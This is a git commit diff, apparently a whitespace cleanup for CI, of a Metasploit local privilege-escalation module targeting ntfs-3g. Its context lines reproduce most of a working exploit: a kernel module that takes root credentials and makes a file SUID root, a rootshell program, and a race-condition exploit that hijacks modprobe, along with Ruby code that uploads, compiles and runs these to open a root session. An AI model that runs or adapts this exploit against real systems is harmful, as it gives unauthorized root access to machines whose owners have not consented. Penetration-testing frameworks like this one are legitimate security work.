forgot add fixes for travis
parent
a8609f5c66
commit
0c353841ab
|
@ -58,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
|
|
||||||
# check if linux headers were installed on Debian (not ubuntu). The 'common' headers won't work.
|
# check if linux headers were installed on Debian (not ubuntu). The 'common' headers won't work.
|
||||||
def headers_installed?()
|
def headers_installed?()
|
||||||
output = cmd_exec('dpkg -l | grep \'^ii\' | grep linux-headers.*[^common]{7}')
|
output = cmd_exec('dpkg -l | grep \'^ii\' | grep linux-headers.*[^common]{7}')
|
||||||
if output
|
if output
|
||||||
if output.include?('linux-headers')
|
if output.include?('linux-headers')
|
||||||
return true
|
return true
|
||||||
|
@ -96,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
CheckCode::Appears
|
CheckCode::Appears
|
||||||
else
|
else
|
||||||
print_error("Version installed not vulnerable: #{output}")
|
print_error("Version installed not vulnerable: #{output}")
|
||||||
CheckCode::Safe
|
CheckCode::Safe
|
||||||
end
|
end
|
||||||
else
|
else
|
||||||
print_error('ntfs-3g not installed')
|
print_error('ntfs-3g not installed')
|
||||||
|
@ -132,18 +132,18 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
#include <linux/cred.h>
|
#include <linux/cred.h>
|
||||||
#include <linux/syscalls.h>
|
#include <linux/syscalls.h>
|
||||||
#include <linux/kallsyms.h>
|
#include <linux/kallsyms.h>
|
||||||
|
|
||||||
static int suidfile_fd = -1;
|
static int suidfile_fd = -1;
|
||||||
module_param(suidfile_fd, int, 0);
|
module_param(suidfile_fd, int, 0);
|
||||||
|
|
||||||
static int __init init_rootmod(void) {
|
static int __init init_rootmod(void) {
|
||||||
int (*sys_fchown_)(int fd, int uid, int gid);
|
int (*sys_fchown_)(int fd, int uid, int gid);
|
||||||
int (*sys_fchmod_)(int fd, int mode);
|
int (*sys_fchmod_)(int fd, int mode);
|
||||||
const struct cred *kcred, *oldcred;
|
const struct cred *kcred, *oldcred;
|
||||||
|
|
||||||
sys_fchown_ = (void*)kallsyms_lookup_name("sys_fchown");
|
sys_fchown_ = (void*)kallsyms_lookup_name("sys_fchown");
|
||||||
sys_fchmod_ = (void*)kallsyms_lookup_name("sys_fchmod");
|
sys_fchmod_ = (void*)kallsyms_lookup_name("sys_fchmod");
|
||||||
|
|
||||||
printk(KERN_INFO "rootmod loading\n");
|
printk(KERN_INFO "rootmod loading\n");
|
||||||
kcred = prepare_kernel_cred(NULL);
|
kcred = prepare_kernel_cred(NULL);
|
||||||
oldcred = override_creds(kcred);
|
oldcred = override_creds(kcred);
|
||||||
|
@ -152,12 +152,12 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
revert_creds(oldcred);
|
revert_creds(oldcred);
|
||||||
return -ELOOP; /* fake error because we don't actually want to end up with a loaded module */
|
return -ELOOP; /* fake error because we don't actually want to end up with a loaded module */
|
||||||
}
|
}
|
||||||
|
|
||||||
static void __exit cleanup_rootmod(void) {}
|
static void __exit cleanup_rootmod(void) {}
|
||||||
|
|
||||||
module_init(init_rootmod);
|
module_init(init_rootmod);
|
||||||
module_exit(cleanup_rootmod);
|
module_exit(cleanup_rootmod);
|
||||||
|
|
||||||
MODULE_LICENSE("GPL v2");
|
MODULE_LICENSE("GPL v2");
|
||||||
}
|
}
|
||||||
|
|
||||||
|
@ -166,7 +166,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
#include <err.h>
|
#include <err.h>
|
||||||
#include <stdio.h>
|
#include <stdio.h>
|
||||||
#include <sys/types.h>
|
#include <sys/types.h>
|
||||||
|
|
||||||
int main(void) {
|
int main(void) {
|
||||||
if (setuid(0) || setgid(0))
|
if (setuid(0) || setgid(0))
|
||||||
err(1, "setuid/setgid");
|
err(1, "setuid/setgid");
|
||||||
|
@ -196,7 +196,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
#include <sys/wait.h>
|
#include <sys/wait.h>
|
||||||
#include <time.h>
|
#include <time.h>
|
||||||
#include <sys/utsname.h>
|
#include <sys/utsname.h>
|
||||||
|
|
||||||
int main(void) {
|
int main(void) {
|
||||||
/* prevent shell from backgrounding ntfs-3g when stopped */
|
/* prevent shell from backgrounding ntfs-3g when stopped */
|
||||||
pid_t initial_fork_child = fork();
|
pid_t initial_fork_child = fork();
|
||||||
|
@ -209,7 +209,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
execl("rootshell", "rootshell", NULL);
|
execl("rootshell", "rootshell", NULL);
|
||||||
exit(0);
|
exit(0);
|
||||||
}
|
}
|
||||||
|
|
||||||
char buf[1000] = {0};
|
char buf[1000] = {0};
|
||||||
// Set up workspace with volume, mountpoint, modprobe config and module directory.
|
// Set up workspace with volume, mountpoint, modprobe config and module directory.
|
||||||
char template[] = "/tmp/ntfs_sploit.XXXXXX";
|
char template[] = "/tmp/ntfs_sploit.XXXXXX";
|
||||||
|
@ -239,7 +239,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
template, template);
|
template, template);
|
||||||
if (system(system_cmd))
|
if (system(system_cmd))
|
||||||
errx(1, "shell command failed");
|
errx(1, "shell command failed");
|
||||||
|
|
||||||
// Set up inotify watch for /proc/mounts.
|
// Set up inotify watch for /proc/mounts.
|
||||||
// Note: /proc/mounts is a symlink to /proc/self/mounts, so
|
// Note: /proc/mounts is a symlink to /proc/self/mounts, so
|
||||||
// the watch will only see accesses by this process.
|
// the watch will only see accesses by this process.
|
||||||
|
@ -248,7 +248,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
err(1, "unable to create inotify fd?");
|
err(1, "unable to create inotify fd?");
|
||||||
if (inotify_add_watch(inotify_fd, "/proc/mounts", IN_OPEN) == -1)
|
if (inotify_add_watch(inotify_fd, "/proc/mounts", IN_OPEN) == -1)
|
||||||
err(1, "unable to watch /proc/mounts");
|
err(1, "unable to watch /proc/mounts");
|
||||||
|
|
||||||
// Set up inotify watch for /proc/filesystems.
|
// Set up inotify watch for /proc/filesystems.
|
||||||
// This can be used to detect whether we lost the race.
|
// This can be used to detect whether we lost the race.
|
||||||
int fs_inotify_fd = inotify_init1(IN_CLOEXEC);
|
int fs_inotify_fd = inotify_init1(IN_CLOEXEC);
|
||||||
|
@ -256,7 +256,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
err(1, "unable to create inotify fd?");
|
err(1, "unable to create inotify fd?");
|
||||||
if (inotify_add_watch(fs_inotify_fd, "/proc/filesystems", IN_OPEN) == -1)
|
if (inotify_add_watch(fs_inotify_fd, "/proc/filesystems", IN_OPEN) == -1)
|
||||||
err(1, "unable to watch /proc/filesystems");
|
err(1, "unable to watch /proc/filesystems");
|
||||||
|
|
||||||
// Set up inotify watch for /sbin/modprobe.
|
// Set up inotify watch for /sbin/modprobe.
|
||||||
// This can be used to detect when we can release all our open files.
|
// This can be used to detect when we can release all our open files.
|
||||||
int modprobe_inotify_fd = inotify_init1(IN_CLOEXEC);
|
int modprobe_inotify_fd = inotify_init1(IN_CLOEXEC);
|
||||||
|
@ -264,7 +264,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
err(1, "unable to create inotify fd?");
|
err(1, "unable to create inotify fd?");
|
||||||
if (inotify_add_watch(modprobe_inotify_fd, "/sbin/modprobe", IN_OPEN) == -1)
|
if (inotify_add_watch(modprobe_inotify_fd, "/sbin/modprobe", IN_OPEN) == -1)
|
||||||
err(1, "unable to watch /sbin/modprobe");
|
err(1, "unable to watch /sbin/modprobe");
|
||||||
|
|
||||||
int do_exec_pipe[2];
|
int do_exec_pipe[2];
|
||||||
if (pipe2(do_exec_pipe, O_CLOEXEC))
|
if (pipe2(do_exec_pipe, O_CLOEXEC))
|
||||||
err(1, "pipe");
|
err(1, "pipe");
|
||||||
|
@ -280,16 +280,16 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
execlp("ntfs-3g", "ntfs-3g", volume, mountpoint, NULL);
|
execlp("ntfs-3g", "ntfs-3g", volume, mountpoint, NULL);
|
||||||
}
|
}
|
||||||
child = getpid();
|
child = getpid();
|
||||||
|
|
||||||
// Now launch ntfs-3g and wait until it opens /proc/mounts
|
// Now launch ntfs-3g and wait until it opens /proc/mounts
|
||||||
if (write(do_exec_pipe[1], buf, 1) != 1)
|
if (write(do_exec_pipe[1], buf, 1) != 1)
|
||||||
errx(1, "pipe write failed");
|
errx(1, "pipe write failed");
|
||||||
|
|
||||||
if (read(inotify_fd, buf, sizeof(buf)) <= 0)
|
if (read(inotify_fd, buf, sizeof(buf)) <= 0)
|
||||||
errx(1, "inotify read failed");
|
errx(1, "inotify read failed");
|
||||||
if (kill(getppid(), SIGSTOP))
|
if (kill(getppid(), SIGSTOP))
|
||||||
err(1, "can't stop setuid parent");
|
err(1, "can't stop setuid parent");
|
||||||
|
|
||||||
// Check whether we won the main race.
|
// Check whether we won the main race.
|
||||||
struct pollfd poll_fds[1] = {{
|
struct pollfd poll_fds[1] = {{
|
||||||
.fd = fs_inotify_fd,
|
.fd = fs_inotify_fd,
|
||||||
|
@ -308,7 +308,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
exit(1);
|
exit(1);
|
||||||
}
|
}
|
||||||
puts("looks like we won the race");
|
puts("looks like we won the race");
|
||||||
|
|
||||||
// Open as many files as possible. Whenever we have
|
// Open as many files as possible. Whenever we have
|
||||||
// a bunch of open files, move them into a new process.
|
// a bunch of open files, move them into a new process.
|
||||||
int total_open_files = 0;
|
int total_open_files = 0;
|
||||||
|
@ -342,13 +342,13 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
if (reached_limit)
|
if (reached_limit)
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
|
|
||||||
// Wake up ntfs-3g and keep allocating files, then free up
|
// Wake up ntfs-3g and keep allocating files, then free up
|
||||||
// the files as soon as we're reasonably certain that either
|
// the files as soon as we're reasonably certain that either
|
||||||
// modprobe was spawned or the attack failed.
|
// modprobe was spawned or the attack failed.
|
||||||
if (kill(getppid(), SIGCONT))
|
if (kill(getppid(), SIGCONT))
|
||||||
err(1, "SIGCONT");
|
err(1, "SIGCONT");
|
||||||
|
|
||||||
time_t start_time = time(NULL);
|
time_t start_time = time(NULL);
|
||||||
while (1) {
|
while (1) {
|
||||||
for (int i=0; i<1000; i++) {
|
for (int i=0; i<1000; i++) {
|
||||||
|
@ -425,7 +425,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
"return execl(\"#{payload_path}\", \"\", NULL);") #launch our payload, and do it in a return to not freeze the executable
|
"return execl(\"#{payload_path}\", \"\", NULL);") #launch our payload, and do it in a return to not freeze the executable
|
||||||
print_status('Writing files to target')
|
print_status('Writing files to target')
|
||||||
cmd_exec("cd #{datastore['WritableDir']}")
|
cmd_exec("cd #{datastore['WritableDir']}")
|
||||||
|
|
||||||
#write all the files and compile. This is equivalent to the original compile.sh
|
#write all the files and compile. This is equivalent to the original compile.sh
|
||||||
#gcc -o rootshell rootshell.c -Wall
|
#gcc -o rootshell rootshell.c -Wall
|
||||||
upload_and_compile('rootshell', rootshell_path, rootshell, "gcc -o #{rootshell_filename} #{rootshell_filename}.c -Wall")
|
upload_and_compile('rootshell', rootshell_path, rootshell, "gcc -o #{rootshell_filename} #{rootshell_filename}.c -Wall")
|
||||||
|
@ -443,7 +443,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
cmd_exec('/sbin/depmod -b depmod_tmp/')
|
cmd_exec('/sbin/depmod -b depmod_tmp/')
|
||||||
cmd_exec('cp depmod_tmp/lib/modules/$(uname -r)/*.bin .')
|
cmd_exec('cp depmod_tmp/lib/modules/$(uname -r)/*.bin .')
|
||||||
cmd_exec('rm -rf depmod_tmp')
|
cmd_exec('rm -rf depmod_tmp')
|
||||||
|
|
||||||
register_file_for_cleanup("#{rootmod_path}.ko")
|
register_file_for_cleanup("#{rootmod_path}.ko")
|
||||||
register_file_for_cleanup("#{rootmod_path}.mod.c")
|
register_file_for_cleanup("#{rootmod_path}.mod.c")
|
||||||
register_file_for_cleanup("#{rootmod_path}.mod.o")
|
register_file_for_cleanup("#{rootmod_path}.mod.o")
|
||||||
|
@ -454,7 +454,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
output = cmd_exec(sploit_path)
|
output = cmd_exec(sploit_path)
|
||||||
unless session_created?
|
unless session_created?
|
||||||
# this could also be output.include?('we have root privs now...'), however session_created handles some additional cases like elevation happened,
|
# this could also be output.include?('we have root privs now...'), however session_created handles some additional cases like elevation happened,
|
||||||
# but binary payload was caught, or NIPS shut down the callback etc.
|
# but binary payload was caught, or NIPS shut down the callback etc.
|
||||||
vprint_error(output)
|
vprint_error(output)
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|